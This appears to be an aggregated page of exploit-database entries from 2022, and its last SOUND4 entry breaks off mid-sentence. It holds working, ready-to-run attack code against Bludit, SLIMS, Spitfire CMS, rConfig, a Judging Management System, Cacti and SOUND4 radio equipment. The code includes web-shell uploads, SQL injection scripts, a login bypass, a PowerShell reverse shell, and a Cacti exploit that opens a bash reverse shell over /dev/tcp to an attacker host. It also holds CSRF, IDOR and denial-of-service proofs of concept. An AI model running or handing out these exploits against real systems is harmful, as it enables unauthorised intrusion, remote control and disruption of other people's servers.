ISHACK AI BOT

# Exploit Title: Bludit 3-14-1 Plugin 'UploadPlugin' - Remote Code Execution (RCE) (Authenticated) # Exploit Author: Alperen Ergel # Contact: @alpernae (IG/TW) # Software Homepage: https://www.bludit.com/ # Version : 3-14-1 # Tested on: windows 11 wampserver | Kali linux # Category: WebApp # Google Dork: intext:'2022 Powered by Bludit' # Date: 8.12.2022 ######## Description ######## # # Step 1 : Archive as a zip your webshell (example: payload.zip) # Step 2 : Login admin account and download 'UploadPlugin' # Step 3 : Go to UploadPlugin section # Step 4 : Upload your zip # Step 5 : target/bl-plugins/[your_payload] # ######## Proof of Concept ######## ==============> START REQUEST <======================================== POST /admin/plugin/uploadplugin HTTP/2 Host: localhost Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------308003478615795926433430552264 Content-Length: 1820 Origin: https://036e-88-235-222-210.eu.ngrok.io Dnt: 1 Referer: https://036e-88-235-222-210.eu.ngrok.io/admin/plugin/uploadplugin Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers -----------------------------308003478615795926433430552264 Content-Disposition: form-data; name="tokenCSRF" b6487f985b68f2ac2c2d79b4428dda44696d6231 -----------------------------308003478615795926433430552264 Content-Disposition: form-data; name="pluginorthemes" plugins -----------------------------308003478615795926433430552264 Content-Disposition: form-data; name="zip_file"; filename="a.zip" Content-Type: application/zip PK eU a/PK fUÆ ª)¢ Ä a/a.phpíVÛÓ0}ç+La BÛìVÜpX®ËJ @V꺭!µíÒrûwl7É$mQyà<$©çÌÌ93ã¸È]Ë·ïóÒ=/. pÝãZ+M5/¶BÎÈ0>©M[jÅÓB,õtO̤Ò. ×4;e)¨¼Èׯ9[Z¡dðÆ &Âd<ó`÷+Ny¼Á RLÉE¾(í7â}âø_¥æ3OºÈ'xð>A¯ppânÁã¤ëÀ×e¡&ük£¼$Øj±ØFýâá@\@ªgxD¢Ì'áôæQ?½v£öG7ñùZgéññõ j±u \õ±à/ï¾ÎÞ´×THÄZujHkªÈ£û§gÑÅ,CÆêRâVjÅ5yùø%}q»ú­Ä(QK*Ë"Öï¡£;Ò²·­6z²ZgXÊò¢ðíÄ'éûù+ñÌ% µj,ÐäàN°ùf,_à8[³lOScsmI«¬«H»¯*Sc?i)i¹´&x@.'<¤Ûç]zs^a®·)hBz0;f rìþǸ0yÕU¥H"ÕÕÿI IØ\t{có~J©£ªä²Ë Ö÷;dÁ³âÙlh»s%Ç Ö8Nº+«}+­ÿaºrÂÂj. îvWS²A¿O?nHO?jO ¤Ã£Q+ì¯æí^ Ï e8©ô*Ô¾"ý¡@Ó2+ëÂ`÷ kC57j©'Î"m ã®ho¹ xô Û;cçzÙQ Ë·[kô¿Ý¯-2ì~¨æv©¥CîTþ#k2,UØS¦­OÁS£ØgúK QÜ ØIϲòÖ`Ð:%F½$A"t;buOMr4Ýè~eãÎåØXíÇmÇ(s 6A¸3,l>º<N®¦q{s __~tÂ6á¾,ÅèçO´ÇÆ×Σv²±ãÿbÃÚUg[;pqeÓÜÅØÿéJ Ë}êv3ð8´# OµsÈO«ýbh±ï°d˹ÿ>yþðMröâÁSzöæõÃûÏÜû)}óàeºqQRrf}êê_D Ø0ìuõv'§öø?@ êûOæh'O8fD¼5[à²=b~PK? eU $ íA a/ þ®, Ù þ®, Ùø¨j. ÙPK? fUÆ ª)¢ Ä $ ¤ a/a.php ¤eÝ- Ù ÷C- Ù bj. ÙPK ­ ç -----------------------------308003478615795926433430552264 Content-Disposition: form-data; name="submit" Upload -----------------------------308003478615795926433430552264-- ==============> END REQUEST <======================================== ## WEB SHELL UPLOADED! ==============> START RESPONSE <======================================== HTTP/2 200 OK Cache-Control: no-store, no-cache, must-revalidate Content-Type: text/html; charset=UTF-8 Date: Thu, 08 Dec 2022 18:01:43 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Ngrok-Trace-Id: f3a92cc45b7ab0ae86e98157bb026ab4 Pragma: no-cache Server: Apache/2.4.51 (Win64) PHP/7.4.26 X-Powered-By: Bludit . . . . ==============> END RESPONSE <======================================== # REQUEST THE WEB SHELL ==============> START REQUEST <======================================== GET /bl-plugins/a/a.php?cmd=whoami HTTP/2 Host: localhost Cookie: BLUDIT-KEY=ri91q86hhp7mia1o8lrth63kc4 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Dnt: 1 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Te: trailers ==============> END REQUEST <======================================== ==============> START RESPONSE <======================================== HTTP/2 200 OK Content-Type: text/html; charset=UTF-8 Date: Thu, 08 Dec 2022 18:13:14 GMT Ngrok-Trace-Id: 30639fc66dcf46ebe29cc45cf1bf3919 Server: Apache/2.4.51 (Win64) PHP/7.4.26 X-Powered-By: PHP/7.4.26 Content-Length: 32 <pre>nt authority\system </pre> ==============> END RESPONSE <========================================

## Exploit Title: Senayan Library Management System v9.0.0 - SQL Injection ## Author: nu11secur1ty ## Date: 11.09.2022 ## Vendor: https://slims.web.id/web/ ## Software: https://github.com/slims/slims9_bulian/releases/download/v9.0.0/slims9_bulian-9.0.0.zip ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi ## Description: The manual insertion `point 3` with `class` parameter appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\\\\0absu0byc9uwy8ivftx7f6auul0fo5cwfk6at2hr.again.com\\fbe'))+' was submitted in the manual insertion point 3. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The application interacted with that domain, indicating that the injected SQL query was executed. ## STATUS: HIGH Vulnerability [+] Payload: ```MySQL --- Parameter: class (GET) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: reportView=true&year=2002&class=bbbb''' RLIKE (SELECT (CASE WHEN (2547=2547) THEN 0x626262622727 ELSE 0x28 END)) AND 'dLjf'='dLjf&membershipType=a&collType=aaaa --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/slims.web.id/SLIMS-9.0.0/SQLi) ## Proof and Exploit: [href](http://localhost:5001/sy5wji) ## Time spent `03:00:00` System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/> -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>

# Exploit Title: Spitfire CMS 1.0.475 - PHP Object Injection # Exploit Author: LiquidWorm Vendor: Claus Muus Product web page: http://spitfire.clausmuus.de Affected version: 1.0.475 Summary: Spitfire is a system to manage the content of webpages. Desc: The application is prone to a PHP Object Injection vulnerability due to the unsafe use of unserialize() function. A potential attacker, authenticated, could exploit this vulnerability by sending specially crafted requests to the web application containing malicious serialized input. ----------------------------------------------------------------------- cms/edit/tpl_backup.inc.php: ---------------------------- 47: private function status () 48: { 49: $status = array (); 50: 51: $status['values'] = array (); 52: $status['values'] = isset ($_COOKIE['cms_backup_values']) ? unserialize ($_COOKIE['cms_backup_values']) : array (); ... ... 77: public function save ($values) 78: { 79: $values = array_merge ($this->status['values'], $values); 80: setcookie ('cms_backup_values', serialize ($values), time()+60*60*24*30); 81: } ----------------------------------------------------------------------- Tested on: nginx Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5720 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5720.php 28.09.2022 -- > curl -isk -XPOST http://10.0.0.2/cms/edit/tpl_backup_action.php \ -H 'Content-Type: application/x-www-form-urlencoded' -H 'Accept: */*' -H 'Referer: http://10.0.0.2/cms/edit/cont_index.php?tpl=backup' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: en-US,en;q=0.9' -H 'Connection: close' \ -H 'Cookie: tip=0; cms_backup_values=O%3a3%3a%22ZSL%22%3a0%3a%7b%7d; cms_username=admin; PHPSESSID=0e63d3a8762f4bff95050d1146db8c1c' \ --data 'action=save&&value=1' #--data 'action=save&&value[files]={}'

# Exploit Title: rconfig 3.9.7 - Sql Injection (Authenticated) # Exploit Author: azhen # Date: 10/12/2022 # Vendor Homepage: https://www.rconfig.com/ # Software Link: https://www.rconfig.com/ # Vendor: rConfig # Version: <= v3.9.7 # Tested against Server Host: Linux # CVE: CVE-2022-45030 import requests import sys import urllib3 urllib3.disable_warnings() s = requests.Session() # sys.argv.append("192.168.10.150") #Enter the hostname if len(sys.argv) != 2: print("Usage: python3 rconfig_sqli_3.9.7.py <host>") sys.exit(1) host=sys.argv[1] #Enter the hostname def get_data(host): print("[+] Get db data...") vul_url = "https://"+host+":443/lib/ajaxHandlers/ajaxCompareGetCmdDates.php?deviceId=-1&command='+union+select+concat(1000%2bord(substr({},{},1)),'-1-1')%20--%20" query_exp = "database()" result_data = "" for i in range(1, 100): burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate"} res = requests.get(vul_url.format(query_exp, i), cookies=s.cookies,verify=False) # print(res.text) a = chr(int(res.text[6:10]) - 1000) if a == '\x00': break result_data += a print(result_data) print("[+] Database name: {}".format(result_data)) ''' output: [+] Logging in... [+] Get db data... r rc rco rcon rconf rconfi rconfig rconfigd rconfigdb [+] Database name: rconfigdb ''' def login(host): print("[+] Logging in...") url = "https://"+host+":443/lib/crud/userprocess.php" headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:86.0) Gecko/20100101 Firefox/86.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "https://demo.rconfig.com", "Connection": "close", "Referer": "https://demo.rconfig.com/login.php", "Upgrade-Insecure-Requests": "1"} data = {"user": "admin", "pass": "admin", "sublogin": "1"} #Use valid set of credentials default is set to admin/admin response=s.post(url, headers=headers, cookies=s.cookies, data=data, verify=False) get_data(host) login(host)

# Exploit Title: Judging Management System v1.0 - Remote Code Execution (RCE) # Date: 12/11/2022 # Exploit Author: Angelo Pio Amirante # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html # Version: 1.0 # Tested on: Windows 10 on XAAMP server import requests,argparse,re,time,base64 import urllib.parse from colorama import (Fore as F,Back as B,Style as S) from bs4 import BeautifulSoup BANNER = """ ╔═══════════════════════════════════════════════════════════════════════════════════════════════════════╗ ║ Judging Management System v1.0 - Auth Bypass + Unrestricted File Upload = Remote Code Execution (RCE) ║ ╚═══════════════════════════════════════════════════════════════════════════════════════════════════════╝ """ def argsetup(): desc = S.BRIGHT + 'Judging Management System v1.0 - Remote Code Execution (RCE)' parser = argparse.ArgumentParser(description=desc) parser.add_argument('-t', '--target', help='Target URL, Ex: http://localhost/php-jms', required=True) parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True) parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True) args = parser.parse_args() return args # Performs Auth bypass in order to get the admin cookie def auth_bypass(args): print(F.CYAN+"[+] Login into the application through Auth Bypass vulnerability...") session = requests.Session() loginUrl = f"{args.target}/login.php" username = """' OR 1=1-- -""" password = "randomvalue1234" data = {'username': username, 'password': password} login = session.post(loginUrl,verify=False,data=data) admin_cookie = login.cookies['PHPSESSID'] print(F.GREEN+"[+] Admin cookies obtained !!!") return admin_cookie # Checks if the file has been uploaded to /uploads directory def check_file(args,cookie): uploads_endpoint = f"{args.target}/uploads/" cookies = {'PHPSESSID': f'{cookie}'} req = requests.get(uploads_endpoint,verify=False,cookies=cookies) soup = BeautifulSoup(req.text,features='html.parser') files = soup.find_all("a") for i in range (len(files)): match = re.search(".*-shelljudgesystem\.php",files[i].get('href')) if match: file = files[i].get('href') print(F.CYAN+"[+] The webshell is at the following Url: "+f"{args.target}/uploads/"+file) return file return None def file_upload(args,cookie): now = int(time.time()) endpoint = f"{args.target}/edit_organizer.php" cookies = {'wp-settings-time-1':f"{now}",'PHPSESSID': f'{cookie}'} get_req = requests.get(endpoint,verify=False,cookies=cookies) soup = BeautifulSoup(get_req.text,features='html.parser') username = soup.find("input",{"name":"username"}).get('value') admin_password = soup.find("input",{"id":"password"}).get('value') print(F.GREEN + "[+] Admin username: " + username) print(F.GREEN + "[+] Admin password: " + admin_password) # Multi-part request file_dict = { 'fname':(None,"Random"), 'mname':(None,"Random"), 'lname':(None,"Random"), 'email':(None,"[email protected]"), 'pnum':(None,"014564343"), 'cname':(None,"Random"), 'caddress':(None,"Random"), 'ctelephone':(None,"928928392"), 'cemail':(None,"[email protected]"), 'cwebsite':(None,"http://company.com"), 'file':("shelljudgesystem.php","<?php system($_REQUEST['cmd']) ?>","application/octet-stream"), 'username':(None,f"{admin_password}"), 'passwordx':(None,f"{admin_password}"), 'password2x':(None,f"{admin_password}"), 'password':(None,f"{admin_password}"), 'update':(None,"") } req = requests.post(endpoint,verify=False,cookies=cookies,files=file_dict) def exploit(args,cookie,file): payload = f"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient('{args.listenip}',{args.listenport})%3b"""+"""$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0){%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()" """ uploads_endpoint = f"{args.target}/uploads/{file}?cmd={payload}" cookies = {'PHPSESSID': f'{cookie}'} print(F.GREEN + "\n[+] Enjoy your reverse shell ") requests.get(uploads_endpoint,verify=False,cookies=cookies) if __name__ == '__main__': print(F.CYAN + BANNER) args = argsetup() cookie=auth_bypass(args=args) file_upload(args=args,cookie=cookie) file_name=check_file(args=args,cookie=cookie) if file_name is not None: exploit(args=args,cookie=cookie,file=file_name) else: print(F.RED + "[!] File not found")

# Exploit Title: Judging Management System v1.0 - Authentication Bypass # Date: 12/11/2022 # Exploit Author: Angelo Pio Amirante # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/15910/judging-management-system-using-php-and-mysql-free-source-code.html # Version: 1.0 # Tested on: Windows 10 on XAAMP server # Vulnerability: An attacker can bypass login page and access to dashboard page # Vulnerable file: login.php # Exploit: 1) Go to: http://localhost/php-jms/index.php 2) As username use this payload: 'or 1=1-- - 3) Use random words for password POST /php-jms/login.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 37 Origin: http://localhost Connection: close Referer: http://localhost/php-jms/index.php Cookie: wp-settings-time-1=1669938282; _pk_id.1.1fff=9c7644c9d84f46f1.1670232782. Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 username=%27or+1%3D1--+-&password=asa

# Exploit Title: Cacti v1.2.22 - Remote Command Execution (RCE) # Exploit Author: Riadh BOUCHAHOUA # Discovery Date: 2022-12-08 # Vendor Homepage: https://www.cacti.net/ # Software Links : https://github.com/Cacti/cacti # Tested Version: 1.2.2x <= 1.2.22 # CVE: CVE-2022-46169 # Tested on OS: Debian 10/11 #!/usr/bin/env python3 import random import httpx, urllib class Exploit: def __init__(self, url, proxy=None, rs_host="",rs_port=""): self.url = url self.session = httpx.Client(headers={"User-Agent": self.random_user_agent()},verify=False,proxies=proxy) self.rs_host = rs_host self.rs_port = rs_port def exploit(self): # cacti local ip from the url for the X-Forwarded-For header local_cacti_ip = self.url.split("//")[1].split("/")[0] headers = { 'X-Forwarded-For': f'{local_cacti_ip}' } revshell = f"bash -c 'exec bash -i &>/dev/tcp/{self.rs_host}/{self.rs_port} <&1'" import base64 b64_revshell = base64.b64encode(revshell.encode()).decode() payload = f";echo {b64_revshell} | base64 -d | bash -" payload = urllib.parse.quote(payload) urls = [] # Adjust the range to fit your needs ( wider the range, longer the script will take to run the more success you will have achieving a reverse shell) for host_id in range(1,100): for local_data_ids in range(1,100): urls.append(f"{self.url}/remote_agent.php?action=polldata&local_data_ids[]={local_data_ids}&host_id={host_id}&poller_id=1{payload}") for url in urls: r = self.session.get(url,headers=headers) print(f"{r.status_code} - {r.text}" ) pass def random_user_agent(self): ua_list = [ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0", ] return random.choice(ua_list) def parse_args(): import argparse argparser = argparse.ArgumentParser() argparser.add_argument("-u", "--url", help="Target URL (e.g. http://192.168.1.100/cacti)") argparser.add_argument("-p", "--remote_port", help="reverse shell port to connect to", required=True) argparser.add_argument("-i", "--remote_ip", help="reverse shell IP to connect to", required=True) return argparser.parse_args() def main() -> None: # Open a nc listener (rs_host+rs_port) and run the script against a CACTI server with its LOCAL IP URL args = parse_args() e = Exploit(args.url, rs_host=args.remote_ip, rs_port=args.remote_port) e.exploit() if __name__ == "__main__": main()

# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Cross-Site Request Forgery # Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First (Version 2: 1.1/2.15) Impact/Pulse/First (Version 1: 2.1/1.69) Impact/Pulse Eco 1.16 Voice Processing: BigVoice4 1.2 BigVoice2 1.30 Web-Audio Streaming: Stream 1.1/2.4.29 Watermarking: WM2 (Kantar Media) 1.11 Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations. With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming. SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1 GNU/Linux 5.10.43 (armv7l) GNU/Linux 4.9.228 (armv7l) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2022-5722 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5722.php 26.09.2022 -- PoC: ---- <form action="http://RADIO/cgi-bin/logoremove.cgi" method="POST"> <input type="submit" value="Disappear" /> </form>

# Exploit Title: SOUND4 Server Service 4.1.102 - Local Privilege Escalation # Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: 4.1.102 Summary: SOUND4 Windows Server Service. Desc: The application suffers from an unquoted search path issue impacting the service 'SOUND4 Server' for Windows. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. Tested on: Windows 10 Home 64 bit (build 9200) SOUND4 Server v4.1.102 SOUND4 Remote Control v4.3.17 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2022-5721 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5721.php 26.09.2022 -- C:\>sc qc "SOUND4 Server" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: SOUND4 Server TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\SOUND4\Server\SOUND4 Server.exe --service LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : SOUND4 Server DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>cacls "C:\Program Files\SOUND4\Server\SOUND4 Server.exe" C:\Program Files\SOUND4\Server\SOUND4 Server.exe NT AUTHORITY\SYSTEM:(ID)F BUILTIN\Administrators:(ID)F BUILTIN\Users:(ID)R APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R C:\Program Files\SOUND4\Server>"SOUND4 Server.exe" -V 4.1.102

# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authorization Bypass (IDOR) # Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First (Version 2: 1.1/2.15) Impact/Pulse/First (Version 1: 2.1/1.69) Impact/Pulse Eco 1.16 Voice Processing: BigVoice4 1.2 BigVoice2 1.30 Web-Audio Streaming: Stream 1.1/2.4.29 Watermarking: WM2 (Kantar Media) 1.11 Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations. With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming. SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper. Desc: The application is vulnerable to insecure direct object references that occur when the application provides direct access to objects based on user-supplied input. As a result of this vulnerability attackers can bypass authorization and access the hidden resources on the system and execute privileged functionalities. Tested on: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1 GNU/Linux 5.10.43 (armv7l) GNU/Linux 4.9.228 (armv7l) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2022-5723 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5723.php 26.09.2022 -- (GET|POST) /** HTTP/1.1 /var/www/: ---------- .SOUND4 about.php actioninprogress.php broken_error.php cfg_filewatch.xml cfg_filewatch_specific.xml checklogin.php checkserver.php config.php datahandlerdlg.php descrxml.php dns.php downloads downloads.php fullrebootsystem.php global.php globaljs.php guifactorysettings.xml guixml.php guixml_error.php header.php images index.php isreboot.php jquery-3.2.1.min.js jquery-plugins jquery-ui-custom jquery-ui-i18n.js jquery-ui.css jquery-ui.js jquery.js jquery.ui.touch-punch.min.js killffmpeg.php linkandshare.php login.php logout.php monitor.php networkdiagnostic.php partialrebootsystem.php ping.php playercfg.xml rebootsystem.php restoreinprogress.php script.min.js secure.php serverinprogress.php settings.php setup.php setup_ethernet.php style.min.css traceroute.php upgrade upgrade.php upgradeinprogress.php uploaded_guicustomload.php uploaded_kantarlic.php uploaded_licfile.php uploaded_logo.php uploaded_presetfile.php uploaded_restorefile.php uploaded_upgfile.php validate_tz.php ws.min.js ws.php wsjquery-class.min.js www-data-handler.php /usr/cgi-bin/: -------------- (GET|POST) /** HTTP/1.1 backup.cgi cgi-form-data downloadkantarlic.cgi ffmpeg.cgi frontpanel getlogs.cgi getlogszip.cgi guicustomsettings.cgi guicustomsettingsload.cgi guifactorysettings.cgi importpreset.cgi loghandler.php logo logoremove.cgi logoupload.cgi phptail.php printenv printenv.vbs printenv.wsf restore.cgi restorefactory.cgi test-cgi upgrade.cgi upload.cgi

# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Denial Of Service (DoS) # Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First (Version 2: 1.1/2.15) Impact/Pulse/First (Version 1: 2.1/1.69) Impact/Pulse Eco 1.16 Voice Processing: BigVoice4 1.2 BigVoice2 1.30 Web-Audio Streaming: Stream 1.1/2.4.29 Watermarking: WM2 (Kantar Media) 1.11 Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations. With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming. SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator and an IMPACT Clipper. Desc: The application allows an unauthenticated attacker to disconnect the current monitoring user from listening/monitoring and takeover the radio stream on a specific channel. ------------------------------------------------------------------------ /var/www/killffmpeg.php: ------------------------ 01: <?php 02: $ret=0; 03: exec("bash -c 'kill $(cat /tmp/webplay.pid)'",$out,$ret); 04: echo $ret; 05: ?> ------------------------------------------------------------------------ Tested on: Apache/2.4.25 (Unix) OpenSSL/1.0.2k PHP/7.1.1 GNU/Linux 5.10.43 (armv7l) GNU/Linux 4.9.228 (armv7l) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic Macedonian Information Security Research and Development Laboratory Zero Science Lab - https://www.zeroscience.mk - @zeroscience Advisory ID: ZSL-2022-5725 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5725.php 26.09.2022 -- > curl -sko -nul https://RADIO/killffmpeg.php

# Exploit Title: SOUND4 IMPACT/FIRST/PULSE/Eco v2.x - Authentication Bypass # Exploit Author: LiquidWorm Vendor: SOUND4 Ltd. Product web page: https://www.sound4.com | https://www.sound4.biz Affected version: FM/HD Radio Processing: Impact/Pulse/First (Version 2: 1.1/2.15) Impact/Pulse/First (Version 1: 2.1/1.69) Impact/Pulse Eco 1.16 Voice Processing: BigVoice4 1.2 BigVoice2 1.30 Web-Audio Streaming: Stream 1.1/2.4.29 Watermarking: WM2 (Kantar Media) 1.11 Summary: The SOUND4 IMPACT introduces an innovative process - mono and stereo parts of the signal are processed separately to obtain perfect consistency in terms of both sound and level. Therefore, in moving reception, when the FM receiver switches from stereo to mono and back to stereo, the sound variations and changes in level are reduced by over 90%. In the SOUND4 IMPACT processing chain, the stereo expander can be used substantially without any limitations. With its advanced functionalities and impressive versatility, SOUND4 PULSE gives clients the ultimate price - performance ratio, providing much more than just a processor. Flexible and powerful, it ensures perfect sound quality and full compatibility with radio broadcasting standards and can be used simultaneously for FM and HD, DAB, DRM or streaming. SOUND4 FIRST provides all the most important functionalities you need in an FM/HD processor and sets the bar high both in terms of performance and affordability. Designed to deliver a sound of uncompromising quality, this tool gives you 2-band processing, a digital stereo generator 